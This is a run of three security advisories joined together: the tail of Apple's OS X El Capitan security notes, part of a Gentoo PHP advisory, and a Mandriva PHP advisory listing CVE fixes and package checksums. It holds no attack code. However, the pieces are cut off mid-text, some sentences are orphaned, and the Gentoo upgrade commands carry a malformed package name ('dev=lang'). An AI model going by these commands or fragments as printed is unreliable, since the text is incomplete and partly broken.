the Notes application. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSH
Description: Multiple vulnerabilities existed in OpenSSH versions
prior to 6.9. These issues were addressed by updating OpenSSH to
version 6.9.
CVE-ID
CVE-2014-2532
OpenSSL
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-0286
CVE-2015-0287
procmail
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in procmail
Description: Multiple vulnerabilities existed in procmail versions
prior to 3.22. These issues were addressed by removing procmail.
CVE-ID
CVE-2014-3618
remote_cmds
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with root
privileges
Description: An issue existed in the usage of environment variables
by the rsh binary. This issue was addressed by dropping setuid
privileges from the rsh binary.
CVE-ID
CVE-2015-5889 : Philip Pettersson
removefile
Available for: Mac OS X v10.6.8 and later
Impact: Processing malicious data may lead to unexpected application
termination
Description: An overflow fault existed in the checkint division
routines. This issue was addressed with improved division routines.
CVE-ID
CVE-2015-5840 : an anonymous researcher
Ruby
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in Ruby
Description: Multiple vulnerabilities existed in Ruby versions prior
to 2.0.0p645. These were addressed by updating Ruby to version
2.0.0p645.
CVE-ID
CVE-2014-8080
CVE-2014-8090
CVE-2015-1855
Security
Available for: Mac OS X v10.6.8 and later
Impact: The lock state of the keychain may be incorrectly displayed
to the user
Description: A state management issue existed in the way keychain
lock status was tracked. This issue was addressed through improved
state management.
CVE-ID
CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,
Eric E. Lawrence, Apple
Security
Available for: Mac OS X v10.6.8 and later
Impact: A trust evaluation configured to require revocation checking
may succeed even if revocation checking fails
Description: The kSecRevocationRequirePositiveResponse flag was
specified but not implemented. This issue was addressed by
implementing the flag.
CVE-ID
CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security
Available for: Mac OS X v10.6.8 and later
Impact: A remote server may prompt for a certificate before
identifying itself
Description: Secure Transport accepted the CertificateRequest
message before the ServerKeyExchange message. This issue was
addressed by requiring the ServerKeyExchange first.
CVE-ID
CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of
Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in SMBClient that led to the
disclosure of kernel memory content. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in SQLite v3.8.5
Description: Multiple vulnerabilities existed in SQLite v3.8.5.
These issues were addressed by updating SQLite to version 3.8.10.2.
CVE-ID
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
Telephony
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker can place phone calls without the user's
knowledge when using Continuity
Description: An issue existed in the authorization checks for
placing phone calls. This issue was addressed through improved
authorization checks.
CVE-ID
CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal
Available for: Mac OS X v10.6.8 and later
Impact: Maliciously crafted text could mislead the user in Terminal
Description: Terminal did not handle bidirectional override
characters in the same way when displaying text and when selecting
text. This issue was addressed by suppressing bidirectional override
characters in Terminal.
CVE-ID
CVE-2015-5883 : an anonymous researcher
tidy
Available for: Mac OS X v10.6.8 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues existed in tidy.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5522 : Fernando Munoz of NULLGroup.com
CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may gain access to keychain items
Description: An issue existed in backups by the Time Machine
framework. This issue was addressed through improved coverage of Time
Machine backups.
CVE-ID
CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of
Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw
S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO
/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6
QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54
YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop
hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O
c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR
8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r
N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT
fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1
nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e
g6jld/w5tPuCFhGucE7Z
=XciV
-----END PGP SIGNATURE-----
.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as
PHP 5.4 is now masked in Portage:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
==========
[ 1 ] CVE-2013-6501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501
[ 2 ] CVE-2014-9705
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705
[ 3 ] CVE-2014-9709
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709
[ 4 ] CVE-2015-0231
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231
[ 5 ] CVE-2015-0273
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273
[ 6 ] CVE-2015-1351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351
[ 7 ] CVE-2015-1352
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352
[ 8 ] CVE-2015-2301
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301
[ 9 ] CVE-2015-2348
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348
[ 10 ] CVE-2015-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783
[ 11 ] CVE-2015-2787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787
[ 12 ] CVE-2015-3329
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329
[ 13 ] CVE-2015-3330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330
[ 14 ] CVE-2015-4021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021
[ 15 ] CVE-2015-4022
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022
[ 16 ] CVE-2015-4025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025
[ 17 ] CVE-2015-4026
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026
[ 18 ] CVE-2015-4147
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147
[ 19 ] CVE-2015-4148
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148
[ 20 ] CVE-2015-4642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642
[ 21 ] CVE-2015-4643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643
[ 22 ] CVE-2015-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644
[ 23 ] CVE-2015-6831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831
[ 24 ] CVE-2015-6832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832
[ 25 ] CVE-2015-6833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833
[ 26 ] CVE-2015-6834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834
[ 27 ] CVE-2015-6835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835
[ 28 ] CVE-2015-6836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836
[ 29 ] CVE-2015-6837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837
[ 30 ] CVE-2015-6838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838
[ 31 ] CVE-2015-7803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803
[ 32 ] CVE-2015-7804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:080
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : php
Date : March 28, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and corrected in php:
It was discovered that the file utility contains a flaw in the handling
of indirect magic rules in the libmagic library, which leads to an
infinite recursion when trying to determine the file type of certain
files (CVE-2014-1943).
A flaw was found in the way the file utility determined the type of
Portable Executable (PE) format files, the executable format used on
Windows. A malicious PE file could cause the file utility to crash or,
potentially, execute arbitrary code (CVE-2014-2270).
The BEGIN regular expression in the awk script detector in
magic/Magdir/commands in file before 5.15 uses multiple wildcards
with unlimited repetitions, which allows context-dependent attackers
to cause a denial of service (CPU consumption) via a crafted ASCII
file that triggers a large amount of backtracking, as demonstrated
via a file with many newline characters (CVE-2013-7345).
PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
socket with world-writable permissions by default, which allows any
local user to connect to it and execute PHP scripts as the apache user
(CVE-2014-0185).
A flaw was found in the way file's Composite Document Files (CDF)
format parser handle CDF files with many summary info entries.
The cdf_unpack_summary_info() function unnecessarily repeatedly read
the info from the same offset. This led to many file_printf() calls in
cdf_file_property_info(), which caused file to use an excessive amount
of CPU time when parsing a specially-crafted CDF file (CVE-2014-0237).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files. A property entry with 0 elements
triggers an infinite loop (CVE-2014-0238).
The unserialize() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue related to the SPL ArrayObject and SPLObjectStorage
Types (CVE-2014-3515).
It was discovered that PHP is vulnerable to a heap-based buffer
overflow in the DNS TXT record parsing. A malicious server or
man-in-the-middle attacker could possibly use this flaw to execute
arbitrary code as the PHP interpreter if a PHP application uses
dns_get_record() to perform a DNS query (CVE-2014-4049).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files, where the mconvert() function did
not correctly compute the truncated pascal string size (CVE-2014-3478).
Multiple flaws were found in the way file parsed property information
from Composite Document Files (CDF) files, due to insufficient boundary
checks on buffers (CVE-2014-0207, CVE-2014-3479, CVE-2014-3480,
CVE-2014-3487).
The phpinfo() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue that can cause it to leak arbitrary process memory
(CVE-2014-4721).
file before 5.19 does not properly restrict the amount of data read
during a regex search, which allows remote attackers to cause a
denial of service (CPU consumption) via a crafted file that triggers
backtracking during processing of an awk rule, due to an incomplete
fix for CVE-2013-7345 (CVE-2014-3538). NOTE: this vulnerability exists because of an incomplete fix
for CVE-2012-1571 (CVE-2014-3587). NOTE:
this issue exists because of an incomplete fix for CVE-2014-4049
(CVE-2014-3597).
An integer overflow flaw in PHP's unserialize() function was
reported. If unserialize() were used on untrusted data, this
issue could lead to a crash or potentially information disclosure
(CVE-2014-3669).
A heap corruption issue was reported in PHP's exif_thumbnail()
function. A specially-crafted JPEG image could cause the PHP
interpreter to crash or, potentially, execute arbitrary code
(CVE-2014-3670).
If client-supplied input was passed to PHP's cURL client as a URL to
download, it could return local files from the server due to improper
handling of null bytes (PHP#68089).
An out-of-bounds read flaw was found in file's donote() function in the
way the file utility determined the note headers of a elf file. This
could possibly lead to file executable crash (CVE-2014-3710).
A use-after-free flaw was found in PHP unserialize(). An untrusted
input could cause PHP interpreter to crash or, possibly, execute
arbitrary code when processed using unserialize() (CVE-2014-8142).
sapi/cgi/cgi_main.c in the CGI component in PHP before 5.5.21, when
mmap is used to read a .php file, does not properly consider the
mapping's length during processing of an invalid file that begins
with a # character and lacks a newline character, which causes an
out-of-bounds read and might allow remote attackers to obtain sensitive
information from php-cgi process memory by leveraging the ability to
upload a .php file or trigger unexpected code execution if a valid
PHP script is present in memory locations adjacent to the mapping
(CVE-2014-9427).
Free called on an uninitialized pointer in php-exif in PHP before
5.5.21 (CVE-2015-0232).
The readelf.c source file has been removed from PHP's bundled copy of
file's libmagic, eliminating exposure to denial of service issues in
ELF file parsing such as CVE-2014-8116, CVE-2014-8117, CVE-2014-9620
and CVE-2014-9621 in PHP's fileinfo module.
S. Paraschoudis discovered that PHP incorrectly handled memory in
the enchant binding.
Taoguang Chen discovered that PHP incorrectly handled unserializing
objects.
It was discovered that PHP incorrectly handled memory in the phar
extension. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2014-8142 (CVE-2015-0231).
An integer overflow flaw, leading to a heap-based buffer overflow,
was found in the way libzip, which is embedded in PHP, processed
certain ZIP archives. If an attacker were able to supply a specially
crafted ZIP archive to an application using libzip, it could cause
the application to crash or, possibly, execute arbitrary code
(CVE-2015-2331).
It was discovered that the PHP opcache component incorrectly handled
memory.
It was discovered that the PHP PostgreSQL database extension
incorrectly handled certain pointers.
PHP contains a bundled copy of the file utility's libmagic library,
so it was vulnerable to the libmagic issues. The libzip packages
has been patched to address the CVE-2015-2331 flaw.
A bug in the php zip extension that could cause a crash has been fixed
(mga#13820)
Additionally the jsonc and timezonedb packages has been upgraded to
the latest versions and the PECL packages which requires so has been
rebuilt for php-5.5.23.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8117
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8142
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9621
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9705
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://php.net/ChangeLog-5.php#5.5.9
http://php.net/ChangeLog-5.php#5.5.10
http://php.net/ChangeLog-5.php#5.5.11
http://php.net/ChangeLog-5.php#5.5.12
http://php.net/ChangeLog-5.php#5.5.13
http://php.net/ChangeLog-5.php#5.5.14
http://php.net/ChangeLog-5.php#5.5.15
http://php.net/ChangeLog-5.php#5.5.16
http://php.net/ChangeLog-5.php#5.5.17
http://php.net/ChangeLog-5.php#5.5.18
http://php.net/ChangeLog-5.php#5.5.19
http://php.net/ChangeLog-5.php#5.5.20
http://php.net/ChangeLog-5.php#5.5.21
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.22
http://php.net/ChangeLog-5.php#5.5.23
http://www.ubuntu.com/usn/usn-2535-1/
http://www.ubuntu.com/usn/usn-2501-1/
https://bugzilla.redhat.com/show_bug.cgi?id=1204676
http://advisories.mageia.org/MGASA-2014-0163.html
http://advisories.mageia.org/MGASA-2014-0178.html
http://advisories.mageia.org/MGASA-2014-0215.html
http://advisories.mageia.org/MGASA-2014-0258.html
http://advisories.mageia.org/MGASA-2014-0284.html
http://advisories.mageia.org/MGASA-2014-0324.html
http://advisories.mageia.org/MGASA-2014-0367.html
http://advisories.mageia.org/MGASA-2014-0430.html
http://advisories.mageia.org/MGASA-2014-0441.html
http://advisories.mageia.org/MGASA-2014-0542.html
http://advisories.mageia.org/MGASA-2015-0040.html
https://bugs.mageia.org/show_bug.cgi?id=13820
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
a4e09575e26b690bd44801a126795ce9 mbs2/x86_64/apache-mod_php-5.5.23-1.mbs2.x86_64.rpm
e156aaf446f543279f758b767e5ce6f2 mbs2/x86_64/lib64php5_common5-5.5.23-1.mbs2.x86_64.rpm
cf1653dd6b3606ff8983739fe7728502 mbs2/x86_64/lib64zip2-0.11.2-1.1.mbs2.x86_64.rpm
2ed6c588ca428a502ab995726d497527 mbs2/x86_64/lib64zip-devel-0.11.2-1.1.mbs2.x86_64.rpm
91fd4a50d38c904247519a34f71ac9a7 mbs2/x86_64/libzip-0.11.2-1.1.mbs2.x86_64.rpm
0fad2aa8ca3bed422588c7d7c349e3e7 mbs2/x86_64/php-bcmath-5.5.23-1.mbs2.x86_64.rpm
b797a14554b170f1f2c307eebd5011ce mbs2/x86_64/php-bz2-5.5.23-1.mbs2.x86_64.rpm
83abadd87c78c719b585acbfcbf1f54a mbs2/x86_64/php-calendar-5.5.23-1.mbs2.x86_64.rpm
71b728b5c58335c37e9ee059a98179b5 mbs2/x86_64/php-cgi-5.5.23-1.mbs2.x86_64.rpm
d6047e2545b396ad29b2619c3d811b49 mbs2/x86_64/php-cli-5.5.23-1.mbs2.x86_64.rpm
933344ca17f96bd844db47c993b8ce1a mbs2/x86_64/php-ctype-5.5.23-1.mbs2.x86_64.rpm
0278a991ed7a7ea1d51c6651b1157744 mbs2/x86_64/php-curl-5.5.23-1.mbs2.x86_64.rpm
a3f172d95d061f6a2ba9ce562f1068ac mbs2/x86_64/php-dba-5.5.23-1.mbs2.x86_64.rpm
d239cccc6594bfe8169c0b5300ca1dd0 mbs2/x86_64/php-devel-5.5.23-1.mbs2.x86_64.rpm
73a234b9c369a20c349fca7f425b405a mbs2/x86_64/php-doc-5.5.23-1.mbs2.noarch.rpm
ab4caa5f1a397e2f267479f08616d027 mbs2/x86_64/php-dom-5.5.23-1.mbs2.x86_64.rpm
016b8d010a1866935f2a6889b712300c mbs2/x86_64/php-enchant-5.5.23-1.mbs2.x86_64.rpm
f9bd5f358336ea8a997f85f4d690fd40 mbs2/x86_64/php-exif-5.5.23-1.mbs2.x86_64.rpm
9f0ef885d5e7abb84c1b0c6242bd1a54 mbs2/x86_64/php-fileinfo-5.5.23-1.mbs2.x86_64.rpm
f551fc699944abdbd78cd1f74e1db713 mbs2/x86_64/php-filter-5.5.23-1.mbs2.x86_64.rpm
10c6ad89a0707acdff025ee0166b4361 mbs2/x86_64/php-fpm-5.5.23-1.mbs2.x86_64.rpm
fad5946e3ff8bf1d3b7215fee229b934 mbs2/x86_64/php-ftp-5.5.23-1.mbs2.x86_64.rpm
c74071a614cc4f8d5ac612736264aad2 mbs2/x86_64/php-gd-5.5.23-1.mbs2.x86_64.rpm
788e0972b5aa918a0c8ce2b0e30270a6 mbs2/x86_64/php-gettext-5.5.23-1.mbs2.x86_64.rpm
996120d4c1fa233bdb38aedf0718f593 mbs2/x86_64/php-gmp-5.5.23-1.mbs2.x86_64.rpm
e032d9a3c8e078242347623f1ff51b5a mbs2/x86_64/php-hash-5.5.23-1.mbs2.x86_64.rpm
c1da3a1898b05995091ad1c2237bdf6a mbs2/x86_64/php-iconv-5.5.23-1.mbs2.x86_64.rpm
37b4a5d86006024878d397a8478d5a42 mbs2/x86_64/php-imap-5.5.23-1.mbs2.x86_64.rpm
bd10d9a55ee8db73b4d80dae1e14e4e0 mbs2/x86_64/php-ini-5.5.23-1.mbs2.x86_64.rpm
4cb54cd72bd26728bb29f5d00a5174af mbs2/x86_64/php-interbase-5.5.23-1.mbs2.x86_64.rpm
2713dca82ad94d88b379db3fa012ed2d mbs2/x86_64/php-intl-5.5.23-1.mbs2.x86_64.rpm
f0a9187b81e038400dae4e01123b751c mbs2/x86_64/php-json-5.5.23-1.mbs2.x86_64.rpm
c395a0cb573d9432c9e4c2a4b92d1d0f mbs2/x86_64/php-ldap-5.5.23-1.mbs2.x86_64.rpm
f2374e34b874072d2268acf1c72b383a mbs2/x86_64/php-mbstring-5.5.23-1.mbs2.x86_64.rpm
7ca3ce3a9464933af1a147c206c25d0d mbs2/x86_64/php-mcrypt-5.5.23-1.mbs2.x86_64.rpm
dbe828f1c2caa3eef932fc0c14a7e2e9 mbs2/x86_64/php-mssql-5.5.23-1.mbs2.x86_64.rpm
995e9f09906309252d850618c3fffaa6 mbs2/x86_64/php-mysql-5.5.23-1.mbs2.x86_64.rpm
c474c1f1dc45f14ea5357092277d2f22 mbs2/x86_64/php-mysqli-5.5.23-1.mbs2.x86_64.rpm
cdcb4872386b83ef3969f918bf99f941 mbs2/x86_64/php-mysqlnd-5.5.23-1.mbs2.x86_64.rpm
cbb1652273fb07f216c50b8d1b5445c2 mbs2/x86_64/php-odbc-5.5.23-1.mbs2.x86_64.rpm
29ab61a3d1d00ad57c875d87b62d2e12 mbs2/x86_64/php-opcache-5.5.23-1.mbs2.x86_64.rpm
349f796a960ef2207b30a06e386f2653 mbs2/x86_64/php-openssl-5.5.23-1.mbs2.x86_64.rpm
7a7411900384da8741e32a3f6f8036c2 mbs2/x86_64/php-pcntl-5.5.23-1.mbs2.x86_64.rpm
ba3b14e45177b257ada03f7ff4b16deb mbs2/x86_64/php-pdo-5.5.23-1.mbs2.x86_64.rpm
ae5b57dbff67c7595e154313321ff693 mbs2/x86_64/php-pdo_dblib-5.5.23-1.mbs2.x86_64.rpm
8782f71797f7cb271a514b735b19621a mbs2/x86_64/php-pdo_firebird-5.5.23-1.mbs2.x86_64.rpm
ac39db58d4100f3d2d24593d3b5907fc mbs2/x86_64/php-pdo_mysql-5.5.23-1.mbs2.x86_64.rpm
210b990793c2d616fb0aecc4fde28eb6 mbs2/x86_64/php-pdo_odbc-5.5.23-1.mbs2.x86_64.rpm
6ae4df7959ddd3a8a0724ddddbe41a71 mbs2/x86_64/php-pdo_pgsql-5.5.23-1.mbs2.x86_64.rpm
1f9bdab81fa668dd583abe873892993e mbs2/x86_64/php-pdo_sqlite-5.5.23-1.mbs2.x86_64.rpm
f0cbb5dde255f5c8fa3e04e3a5314ab1 mbs2/x86_64/php-pgsql-5.5.23-1.mbs2.x86_64.rpm
e46ac8c820911a6091540e135f103154 mbs2/x86_64/php-phar-5.5.23-1.mbs2.x86_64.rpm
5050a745bfc3b1f5eeced2dd85f79721 mbs2/x86_64/php-posix-5.5.23-1.mbs2.x86_64.rpm
c9093134a518c07f4e8a188987f853d3 mbs2/x86_64/php-readline-5.5.23-1.mbs2.x86_64.rpm
2b48c3f35573e00b5ba4327e8edc05f2 mbs2/x86_64/php-recode-5.5.23-1.mbs2.x86_64.rpm
ae2157230db4d6e28698db384c8f7fcb mbs2/x86_64/php-session-5.5.23-1.mbs2.x86_64.rpm
2610a739bfa29ff11e648c7baa1d8bc3 mbs2/x86_64/php-shmop-5.5.23-1.mbs2.x86_64.rpm
b7999e11cf9d2ab510263e32cabaf312 mbs2/x86_64/php-snmp-5.5.23-1.mbs2.x86_64.rpm
ab665c30f0d2f13baa1c6475b7df7cac mbs2/x86_64/php-soap-5.5.23-1.mbs2.x86_64.rpm
f331837ba716316cef094765a1700101 mbs2/x86_64/php-sockets-5.5.23-1.mbs2.x86_64.rpm
134f8bb18790bd023e73919a794703a0 mbs2/x86_64/php-sqlite3-5.5.23-1.mbs2.x86_64.rpm
4b4aa44d0ac56629610bb0444f199df5 mbs2/x86_64/php-sybase_ct-5.5.23-1.mbs2.x86_64.rpm
fc69f644f36308d81f37f356b76e40a1 mbs2/x86_64/php-sysvmsg-5.5.23-1.mbs2.x86_64.rpm
981b7ef6715aacfe9250b206dbbbad31 mbs2/x86_64/php-sysvsem-5.5.23-1.mbs2.x86_64.rpm
91c006555173d03f1d25899947702673 mbs2/x86_64/php-sysvshm-5.5.23-1.mbs2.x86_64.rpm
62e5fa5fa8b4d89d7835f2f68169af14 mbs2/x86_64/php-tidy-5.5.23-1.mbs2.x86_64.rpm
0c5a9237c710dd098c8bb56018f7a142 mbs2/x86_64/php-timezonedb-2015.1-1.mbs2.x86_64.rpm
d94aa68a9ce76bce5c962c58f37ac5a5 mbs2/x86_64/php-tokenizer-5.5.23-1.mbs2.x86_64.rpm
317c7da32daa223560dc08bbae89d98d mbs2/x86_64/php-wddx-5.5.23-1.mbs2.x86_64.rpm
9b2cf90dfc6f6bdc0431a6f94d43a947 mbs2/x86_64/php-xml-5.5.23-1.mbs2.x86_64.rpm
0a1b6e0beeb36f24f9250a352fbff1e9 mbs2/x86_64/php-xmlreader-5.5.23-1.mbs2.x86_64.rpm
598925bc71347774e805b6fcfcbcf590 mbs2/x86_64/php-xmlrpc-5.5.23-1.mbs2.x86_64.rpm
49a1f8e773e98bb101488b805670651c mbs2/x86_64/php-xmlwriter-5.5.23-1.mbs2.x86_64.rpm
0b7c2f2fe7b3103631dd07d12d443e06 mbs2/x86_64/php-xsl-5.5.23-1.mbs2.x86_64.rpm
5cb68626d863213de934655dac8342c8 mbs2/x86_64/php-zip-5.5.23-1.mbs2.x86_64.rpm
a27bab106c0ba87f220ff35937210a63 mbs2/x86_64/php-zlib-5.5.23-1.mbs2.x86_64.rpm
3dd6a6eeb12c7207446053e4785d6974 mbs2/SRPMS/libzip-0.11.2-1.1.mbs2.src.rpm
5d69769d822628a5bf1485eaa1251b8e mbs2/SRPMS/php-5.5.23-1.mbs2.src.rpm
